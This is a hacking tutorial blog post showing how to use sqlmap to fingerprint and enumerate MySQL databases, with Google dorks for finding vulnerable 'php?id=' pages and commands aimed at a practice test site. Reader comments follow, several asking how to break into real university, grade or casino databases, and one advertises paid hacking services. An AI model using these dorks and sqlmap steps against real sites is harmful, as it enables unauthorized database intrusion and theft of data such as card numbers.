Welcome back, my amateur hackers!
In this tutorial, we will follow up on a previous tutorial on MySQL. In that tutorial, I showed you the basics of running a MySQL server on BackTrack. In addition, you might want to take a look at my tutorial on the basics of databases, if you are not familiar with databases and DataBase Management Systems (DBMS). Since MySQL is SO important in so many web applications, I will be doing more MySQL tutorials in the future. The more you know about MySQL, the better you can hack MySQL!
Generally, MySQL is teamed up with PHP and an Apache web server (often referred to as LAMPP or XAMPP) to build dynamic, database driven web sites. Such development packages as Drupal, Joomla, Wordpress, Ruby on Rails and others all use MySQL as their default database. Millions of websites have MySQL backends and very often they are "homegrown" websites, without much attention on security.
In this tutorial, we will looking to extract information about an online MySQL database before we actually extract information from the database. Once again, I'll repeat, the more we know, the more successful we will be in hacking and the less chance you will be detected.
Here, we will be using one of the best database hacking tools available, sqlmap. Sqlmap can be used for databases other than MySQL, such Microsoft's SQL Server and Oracle, but here we will focus its capabilities on those ubiquitous web sites that are built with PHP, Apache and MySQL.
Step 1: Start Sqlmap
First, fire up BackTrack and go to BackTrack, then Information Gathering, then Database Analysis, then MySQL Analysis and finally, sqlmap as shown in the screenshot below.
Step 2: Find a Vulnerable Web Site
In order to get "inside" the web site and ultimately, the database, we are looking for web sites that end in "php?id=" where XXX represents some number. Those who are familiar with google hacks/dorks can do a search on google by entering:
- inurl:index.php?id=
- inurl:gallery.php?id=
- inurl:post.php?id=
- inurl:article?id=
...among others.
This will bring up literally millions of web sites with this basic vulnerability criteria. If you are creative and ambitious, you can find numerous web sites that list vulnerable web sites. You might want to check these out.
For our purposes here and to keep you out of the long reach of the law, we will be hacking a website designed for this purpose, www.webscanhost.org. We can practice on this web site and refine your skills without worrying about breaking any laws and having to make bail money for you.
Step 3: Open Sqlmap
When you click on sqlmap, you will be greeted by a screen like that below. Sqlmap is a powerful tool, written as a Python script (we will be doing Python tutorial soon) that has a multitude of options. We will just be scratching the surface of its capabilities in this tutorial.
Step 4: Determine the DBMS Behind the Web Site
Before we begin hacking a web site, we need to gather information. We need to know WHAT we are hacking. As I have said many times before, most exploits are very specific to the OS, the application, services, ports, etc. Let's begin by finding out what the DBMS is behind this web site.
The start sqlmap on this task, we type:
- ./sqlmap.py -u "the entire URL of the vulnerable web page"
or this case:
- ./sqlmap.py -u "http://www.webscantest.com/datastore/ search_get_by_id.php?id=4"
When we do so, sqlmap will return results like that below. Notice where I highlighted that the web site back-end is using MySQL 5.0
Step 5: Find the Databases
Now that we know what the database management system (DBMS) is MySQL 5.0, we need to know what databases it contains. sqlmap can help us do that. We take the command we used above and append to it --dbs, like this:
- ./sqlmap.py -u "http://www.webscantest.com/datastore/
search_get_by_id.php?id=4" --dbs
When run this command against www.webscantest.com we get the results like those below. Notice that I have highlighted the two available databases, information schema and scanme. Information schema is included in every MySQL installation and it includes information on all the objects in the MySQL instance, but not data of interest. Although it can be beneficial to explore that database to find objects in all the databases in the instance, we will focus our attention on the other database here , scanme, that may have some valuable information. Let's explore it further.
Step 6: Get More Info from the Database
So, now we know what the DBMS is (MySQL 5.0) and the name of a database of interest (scanme). The next step is to try to determine the tables and columns in that database. In this way, we will have some idea what data is in the database, where it is and what type of data (numeric or string). All of this information is critical and necessary to extracting the data. To do this, we need to make some small revisions to our sqlmap command. Everything else we have used above remains the same, but now we tell sqlmap we want to see the tables and columns from the scanme database. We can append our command with --columns -D and the name of the database, scanme such as this:
- ./sqlmap.py -u "http://www.webscantest.com/datastore/
search_get_by_id.php?id=4" --dbs --columns -D scanme
When we do so, sqlmap will target the scanme database and attempt to enumerate the tables and columns in the scanme database.
As we can see below, sqlmap successfully was able to enumerate three tables; (1) accounts, (2) inventory, and (3) orders, complete with column names and datatypes. Not Bad!
Note that the orders table below includes credit card numbers, expiration dates and CVV. The hacker's "Golden Fleece"!!
As you can see, sqlmap can be very versatile and useful tool for MySQL, as well as SQL Server and Oracle database hacking. We will plan on coming back to sqlmap in the near future to explore more of its extensive database hacking capabilities.
Keep coming back, my amateur hackers, for more adventures in Hackerland!
Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:
28 Comments
master:
If I only know the url of site....ex. http://WWW.ABC.COM...how can i know if it contains "phpid="?
Hey SecretKing, try just browsing through the site and pay attention to the changes in the url. Or go to a google search and type 'inurl:abc.com phpid' and see if it shows up!
I used uniscan on backtrack ...select dynamic test...it's great
Hope i helps
using unescaped version of the test because of zero knowledge of the back-end DBMS is returned..any ideas?
And how to see values entered in that columns?
Rohit:
Check out this tutorial .
OTW
Dear OTW, if I find a website's mysql credentials(e.g a wordpress or joomla site), how can I login to mysql? victim.com/cpanel doesn't work.
You can find the admin panel using some admin panel finding tools ...
BackTrack is no longer available on site. What to do now? Is there anyother way to use this method?
Wasi:
You can download BackTrack's successor, Kali, at www.kali-linux.com.
OTW
So you have shown us how to hack Websites that are easy to hack(with easy inurl searching). But the most websites are better protected now and Sqlmap wont work with this tutorial. So could you show us how to "hack" "better protected" Websites? I think i'm not the only guy who wanna know this.
thx alot :)
I would like to know as many others how to hack into online server based Casino game to change the Fake chips value or how to get an old account back that was banned. The game im asking about is Bigfish casino
Hello, I enjoy reading your tutorials. I would like to ask you about this site www.webscanhost.org, it seems down , do you recommend any other site to practice SQL injection skills .
Its www.webscantest.com
./sqlmap.py -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4 " --dbs
not showing any database on the site..what to do
Vivek:
Check your syntax and try again. If it fails again, send a screenshot.
OTW
I challenge you to go talk to her..
so can you apply the same SQL injection in hacking and changing your online grades
I could use some help recovering a client database. Will pay via PayPal. Any takers?
nice tut
lord marcus can go to hell,no one need his help here
Penetration and Invisible crawl-In ( SQL Sequence ) is what we specialise/Love doing.
However, Check closely with us on your School Grades Change
#ServerManipulation #Email/Social Media Penetration
#EMail Extraction #Independent Crawl-In #By-Pass Double Authentication
#PeopleTrace ( With Real Time Tracking ) #Website Design/Maintenance Etc.
Email us with Detailed disclosure About your project
Email :aceteam@cyberservices.com
phone:+1 347 868 2940
Pls how can I remotely alter a database through sqli. Is it possible with sqlmap
kali gives more easy steps
any body can help me
i can not give db at one site
i do all way please help me
my skype:alireza11021561
how to protect our website database to hacking
Please how do I get the sqlmap software
How do I hack database of an institution such as a university
Share Your Thoughts